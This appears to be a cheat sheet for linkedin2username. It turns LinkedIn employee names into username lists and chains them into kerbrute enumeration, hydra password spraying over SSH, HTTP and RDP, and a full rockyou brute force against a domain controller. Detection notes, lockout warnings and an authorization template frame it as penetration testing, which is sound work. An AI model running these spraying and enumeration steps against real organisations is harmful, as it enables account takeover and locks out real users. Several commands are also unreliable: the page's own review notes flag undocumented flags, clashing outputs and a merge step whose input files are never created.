
linkedin2username

linkedin2username is a tool that generates potential username lists from LinkedIn company employee data. During authorized penetration testing and security research, it helps identify valid usernames for targeted environments by generating candidates from publicly available employee information. The tool supports multiple naming conventions (firstname.lastname, firstnamelastname, flastname, etc.) and integrates with credential enumeration workflows for authorized security testing.

# Clone from GitHub
# NOTE(review): this checks out the default branch at whatever commit is
# current; nothing here pins or verifies the code the next steps execute.
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install dependencies
# Installs into the active Python environment; a virtual environment keeps
# these third-party packages separate from system tooling.
pip3 install -r requirements.txt

# Make executable
chmod +x linkedin2username.py
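# Clone repository
# NOTE(review): the clone tracks the default branch; no commit is pinned.
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install with pip
pip3 install -r requirements.txt

# Create symlink for easy access
# The path is quoted so a working directory containing spaces still yields a
# single argument. The link points into this user-writable clone, so any later
# change to the clone changes what /usr/local/bin/linkedin2username runs.
sudo ln -s "$(pwd)/linkedin2username.py" /usr/local/bin/linkedin2username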
# Clone repository
# NOTE(review): no commit or tag is pinned; the default branch is used as-is.
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install dependencies
# Installs into whichever Python environment `pip` resolves to on this host.
pip install -r requirements.txt

# Run with Python
# No arguments are passed here; the usage examples on this page supply -c.
python linkedin2username.py
# Clone and install
# NOTE(review): unpinned clone of the default branch, as in the other
# install variants.
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
pip3 install -r requirements.txt

# Or install via apt
# NOTE(review): whether the distribution's repositories carry this package is
# not shown here - check with `apt-cache policy linkedin2username` first.
apt-get install linkedin2username
| Command | Description |
|---------|-------------|
| `python3 linkedin2username.py -c "Company Name"` | Generate usernames from company employees |
| `python3 linkedin2username.py -c "Company" -f firstname.lastname` | Custom format output |
| `python3 linkedin2username.py -c "Company" -o output.txt` | Save to file |
| `python3 linkedin2username.py -l employees.txt` | Use local HTML file |
# Basic usage with company name
# NOTE(review): the flags on this page (-c, -f, -o, -l, -i, --auth, -v) are
# taken as given; confirm each against `python3 linkedin2username.py -h` for
# the checkout in use.
python3 linkedin2username.py -c "Acme Corporation"

# Save output to file
# The resulting list is derived from named employees; store it with the rest
# of the engagement data.
python3 linkedin2username.py -c "Acme" > usernames.txt

# Multiple companies
python3 linkedin2username.py -c "Company1" > company1.txt
python3 linkedin2username.py -c "Company2" > company2.txt
# The company*.txt glob picks up every matching file in the directory,
# including ones left over from earlier runs.
cat company*.txt > all_users.txt

# Use with other tools
# tee prints the list and writes target_users.txt in one pass.
python3 linkedin2username.py -c "Target" | tee target_users.txt
# NOTE(review): the sample outputs in these comments are not consistent with
# each other - "first" is an initial in first.last (j.smith) but a full name
# in first_last (john_smith), and capitalisation varies. Check real output
# before assuming a format's shape.

# firstname.lastname (John.Smith)
python3 linkedin2username.py -c "Company" -f "firstname.lastname"

# firstnamelastname (JohnSmith)
python3 linkedin2username.py -c "Company" -f "firstnamelastname"

# first.last (j.smith)
python3 linkedin2username.py -c "Company" -f "first.last"

# firstlast (jsmith)
python3 linkedin2username.py -c "Company" -f "firstlast"

# first_last (john_smith)
python3 linkedin2username.py -c "Company" -f "first_last"

# Custom format with initials
# NOTE(review): "firstinitial.lastname" does not appear in the format list
# given elsewhere on this page - confirm it is accepted.
python3 linkedin2username.py -c "Company" -f "firstinitial.lastname"
# Given: John Smith

# Format 1: firstname.lastname → john.smith
# Format 2: firstnamelastname → johnsmith
# Format 3: first.last → j.smith
# Format 4: firstlast → jsmith
# Format 5: first_last → john_smith
# Format 6: flastname → jsmith
# Format 7: first → john
# Format 8: last → smith
# Method 1: Manual data extraction
# 1. Navigate to company LinkedIn page
# 2. Search for "current employees"
# 3. Export/copy employee list
# 4. Save as employees.txt

# Method 2: Using LinkedIn API (if available)
# Requires LinkedIn authentication
# Limited by terms of service
# Credentials passed as an argument are visible in the process list and are
# saved to shell history.
# NOTE(review): --auth is reproduced as written on this page; confirm the
# option exists in the installed version.
python3 linkedin2username.py -c "Company" --auth username:password
# Using browser automation
# Save LinkedIn search results to HTML

# Option 1: Manual browser export
# 1. Open LinkedIn company page
# 2. Scroll through employees
# 3. Right-click → Save as... (employees.html)
# 4. Use with linkedin2username

# The saved page holds employee names and profile data; handle employees.html
# like the rest of the engagement data.
# NOTE(review): -l is combined with -c here but shown alone in the command
# table - confirm which form the tool expects.
python3 linkedin2username.py -l employees.html -c "Company"

# Option 2: Using Selenium (if supported)
# Automates LinkedIn data extraction
# If you have employee list in text format
# The quoted 'EOF' delimiter writes the four sample names literally, one per
# line, replacing any existing employees.txt.
cat << 'EOF' > employees.txt
John Smith
Jane Doe
Bob Johnson
Alice Williams
EOF

# Convert to usernames
# NOTE(review): -i does not appear in the command table on this page; confirm
# the option against the tool's -h output.
python3 linkedin2username.py -i employees.txt -f "firstlast"
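#!/bin/bash
# Generate all common username formats for one company, then merge them into
# a single deduplicated list.
#
# Outputs: ${COMPANY}_<format>.txt per format, ${COMPANY}_all_usernames.txt.
# Stops at the first failing command instead of merging partial results.
set -euo pipefail

COMPANY="Acme"
FORMATS=(
  "firstname.lastname"
  "firstnamelastname"
  "first.last"
  "firstlast"
  "first_last"
  "flastname"
)

outputs=()
for format in "${FORMATS[@]}"; do
  echo "[*] Generating format: $format"
  out="${COMPANY}_${format}.txt"
  # Truncate rather than append, so a re-run does not pile new results on top
  # of stale entries from an earlier run.
  python3 linkedin2username.py -c "$COMPANY" -f "$format" > "$out"
  outputs+=("$out")
done

# Combine and deduplicate
# Only the files written above are merged; a ${COMPANY}_*.txt glob would also
# pull in ${COMPANY}_all_usernames.txt left over from a previous run.
sort -u -- "${outputs[@]}" > "${COMPANY}_all_usernames.txt"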
# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt

# Prepare for password spraying
# Create user:password combinations
# credentials.txt pairs every account name with one guessed password in
# cleartext. `read` without -r treats backslashes as escapes, which is
# harmless for plain alphanumeric usernames.
while read username; do
  echo "${username}:Password123"
done < usernames.txt > credentials.txt

# Use with hydra
# Detection: one source address failing authentication for many distinct
# accounts in a short window is the pattern this leaves in SSH auth logs.
hydra -L usernames.txt -P passwords.txt \
  -t 4 ssh://192.168.1.10

# Use with kerbrute
# Detection: with Kerberos auditing enabled, a burst of event 4768 failures
# with result code 0x6 (unknown principal) from one host is the usual sign of
# this enumeration - confirm against the DC's audit policy.
kerbrute userenum --dc 192.168.1.10 -d domain.local usernames.txt
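# From linkedin2username usernames, generate email addresses
# Assuming company domain is company.local

# IFS= and -r keep each line exactly as written (no trimming, no backslash
# processing); the || clause still handles a final line without a newline.
while IFS= read -r username || [ -n "$username" ]; do
  printf '%s\n' "${username}@company.local"
done < usernames.txt > emails.txt

# Generate variations
# Reads line by line instead of `for ... in $(cat ...)`, which would split on
# any whitespace and expand glob characters found in the file.
while IFS= read -r username || [ -n "$username" ]; do
  printf '%s\n' \
    "${username}@company.local" \
    "${username}@company.com" \
    "${username}@mail.company.local"
done < usernames.txt | sort -u > emails_all.txt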
# Deduplicate the list into usernames_unique.txt
sort -u -o usernames_unique.txt usernames.txt

# Keep only entries shaped like "<one lowercase letter>.<rest>"
grep '^[a-z][.]' usernames.txt > firstname_initial.txt

# Count lines, i.e. the total number of usernames
wc -l < usernames.txt

# Rank the text before the first dot (the first name in dotted formats)
cut -d . -f 1 usernames.txt | sort | uniq -c | sort -r -n

# Flag names that look like service or privileged accounts
grep -i -e 'svc' -e 'service' -e 'admin' -e 'test' usernames.txt
# Keep only the first whitespace-separated field of each output line
python3 linkedin2username.py -c "Company" -f "firstlast" \
  | awk '{ print $1 }' > targets.txt

# Frequency list: how often each username occurs, most frequent first
sort usernames.txt | uniq -c | sort -r -n > frequency.txt

# Pattern analysis: strip digits, then count how many names share each stem
sed 's/[0-9]//g' usernames.txt | sort | uniq -c > pattern_analysis.txt
# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt

# Use kerbrute to find valid AD usernames
# Detection: with Kerberos auditing enabled, many event 4768 failures with
# result code 0x6 (unknown principal) from a single source in a short window
# indicate this kind of enumeration - confirm against the DC's audit policy.
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt

# Output valid usernames
# NOTE(review): the format of the file written by -o is not shown on this
# page; inspect it before passing it to another tool.
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt -o valid_users.txt
# Generate usernames with format suitable for hydra
python3 linkedin2username.py -c "Target" -f "firstlast" > users.txt

# Create password list
# The first echo truncates passes.txt and the second appends, so the file
# ends up with exactly these two guesses in cleartext.
echo "Password123" > passes.txt
echo "Welcome2026" >> passes.txt

# Every attempt below counts toward the domain's lockout threshold; with two
# passwords per account, a low threshold can lock out real users.
# Detection: failures spread across many accounts from one source (Windows
# event 4625, or failed-password lines in SSH auth logs) are the signal.

# SSH password spray
hydra -L users.txt -P passes.txt \
  -t 4 -f ssh://192.168.1.100

# HTTP/HTTPS
# NOTE(review): no form fields or failure condition are given for the
# http-post-form target here; the command is reproduced as written.
hydra -L users.txt -P passes.txt \
  -t 4 -f http-post-form://target.com/login

# RDP
hydra -L users.txt -P passes.txt \
  -t 4 -f rdp://192.168.1.200
# Generate username list
python3 linkedin2username.py -c "Target" > usernames.txt

# Use in Metasploit for credential testing
# msfconsole starts an interactive console; the use/set lines below are typed
# at its prompt, not run by the shell.
msfconsole

# NOTE(review): the module paths and the USER_AS_PASS option are reproduced
# as written and are not checked here against a Metasploit release. Nothing
# below references usernames.txt.

# Load module for enumeration
use auxiliary/scanner/snmp/snmp_enum_users

# Or use with auxiliary SSH scanner
use auxiliary/scanner/ssh/ssh_version

# Set options
set USER_AS_PASS true
set RHOSTS 192.168.1.0/24
#!/bin/bash
# Integrated username generation and validation
#
# NOTE(review): there is no `set -e` and no status checks, so each stage runs
# even if the previous one failed, possibly on an empty or stale file.
# users_temp.txt and valid_users.txt are fixed names in the current directory;
# only users_temp.txt is removed at the end.

COMPANY="Target"
DOMAIN="domain.local"
DC_IP="192.168.1.10"

echo "[*] Generating LinkedIn usernames for $COMPANY"
python3 linkedin2username.py -c "$COMPANY" -f "firstlast" > users_temp.txt

echo "[*] Validating usernames against AD..."
# $DC_IP and $DOMAIN are unquoted; this is safe only while they stay the
# space-free constants set above.
kerbrute userenum --dc $DC_IP -d $DOMAIN users_temp.txt -o valid_users.txt

echo "[*] Valid users found:"
cat valid_users.txt

echo "[*] Attempting to crack passwords..."
# Running a full wordlist against every account will exceed any lockout
# threshold, which is an availability risk for the environment under test.
# Detection: sustained authentication failures from one source against the
# domain controller's SSH service are visible in its auth logs.
hydra -L valid_users.txt -P /usr/share/wordlists/rockyou.txt \
  -t 4 ssh://$DC_IP

# Cleanup
# valid_users.txt, which lists confirmed account names, is left on disk.
rm users_temp.txt
# LinkedIn terms-of-service constraints
# - LinkedIn's ToS prohibits scraping in most regions
# - Alternative: LinkedIn's official recruiter tools
# - Pen tests: written authorization is required before use
# - Scope must name the companies/departments covered

# Authorization record template (prints six lines to stdout)
printf '%s\n' \
  "LinkedIn2Username Authorization" \
  "Target Company: ACME Corporation" \
  "Scope: Current employees only" \
  "Purpose: Authorized penetration test" \
  "Duration: 2026-05-02 to 2026-05-15" \
  "Approval: [Manager Signature]"
# Responsible username generation
# 1. Only generate from authorized company
# 2. Use only within authorized test scope
# 3. Don't share usernames outside test team
# 4. Report findings securely
# 5. Cleanup and document usage

# Example report
# The quoted 'EOF' delimiter writes the text literally, with no variable
# expansion, and overwrites any existing engagement_report.txt.
# The figures are presumably sample values. A real report of this shape
# identifies accounts with weak passwords, so it is as sensitive as the
# credential data itself.
cat << 'EOF' > engagement_report.txt
LinkedIn2Username Analysis Report
Target: ACME Corporation
Date: 2026-05-02
Scope: Authorized security testing

Findings:
- 542 LinkedIn employees identified
- 4 naming convention variations tested
- 267 unique username formats generated
- 89 valid AD usernames confirmed (via kerbrute)
- 12 accounts with weak/default passwords

Recommendations:
- Implement username policy controls
- Deploy MFA across all accounts
- Monitor for failed authentication attempts
- Review LinkedIn visibility policies
EOF
# Company name not found
# Solution: Try variations
python3 linkedin2username.py -c "ACME"
python3 linkedin2username.py -c "Acme Corp"
python3 linkedin2username.py -c "ACME Corporation"

# Verify format string
# -h presumably prints the option list and exits, so the -c value is unused
# here.
python3 linkedin2username.py -c "Company" -h
# Check available format options

# Debug output
# NOTE(review): -v is not listed in the command table on this page; confirm
# it against the -h output.
python3 linkedin2username.py -c "Company" -v
# Special characters in names
# Solution: Script handles most cases, but verify output
# Shows only the first 20 generated lines for a quick visual check.
python3 linkedin2username.py -c "Company" -f "firstlast" | head -20

# Numbers in names (Jr., II, III)
# These may be stripped depending on format
# NOTE(review): this pattern matches digits only; "Jr.", "II" and "III"
# contain none, so the grep will not surface those suffixes.
grep "[0-9]" usernames.txt

# Hyphenated names
# May be handled as single or separate
# Lists every line that contains a hyphen.
grep "\-" usernames.txt
# Kerbrute not finding users
# Verify usernames match domain format
# Try different formats
# NOTE(review): the first command prints to stdout and does not write
# users.txt, which the second command reads.
python3 linkedin2username.py -c "Company" -f "first.last"
kerbrute userenum --dc dc.domain.local -d domain.local users.txt

# Password spraying timeout
# Reduce thread count
# -t 2 lowers the number of parallel tasks from the 4 used elsewhere on this
# page.
hydra -L users.txt -P pass.txt -t 2 ssh://target

# Check for account lockout policies
# Adjust spray rate accordingly
# Exceeding the lockout threshold locks out real users, so the policy is a
# constraint on the test and not just a detection control.
# For 5000+ employees
# Split into smaller batches
# split writes 1000-line files named batch_aa, batch_ab, ... in the current
# directory.
split -l 1000 large_usernames.txt batch_

# Process in parallel
# Each batch starts its own background kerbrute process, so all batches hit
# the domain controller at once. That concentrates load on the DC and makes
# the Kerberos request burst easier to detect.
# $batch is unquoted; this is safe only because split's output names contain
# no spaces.
for batch in batch_*; do
  kerbrute userenum --dc dc.domain.local \
    -d domain.local $batch &
done
# Blocks until every background job has exited; their exit statuses are not
# checked.
wait

# Combine results
# NOTE(review): the loop above passes no -o option, so nothing shown here
# creates valid_*.txt.
cat valid_*.txt > all_valid_users.txt
# Save generated usernames for reuse
# The date suffix (YYYYMMDD) gives one file per day; a second run on the same
# day overwrites the first.
python3 linkedin2username.py -c "Company" -f "firstlast" \
  > company_usernames_$(date +%Y%m%d).txt

# Search cache for existing lists
# Nothing on this page deletes these dated files, so lists of employee-derived
# names accumulate until removed by hand.
ls company_usernames_*.txt
grep "john" company_usernames_*.txt
  • linkedin2username GitHub Repository
  • LinkedIn Terms of Service
  • Kerbrute User Enumeration
  • Hydra Password Spraying
  • OSINT Techniques for Penetration Testing
  • Authorized Security Testing Guidelines
  • Social Engineering Attacks
  • MITRE ATT&CK T1589 Gather Victim Identity Information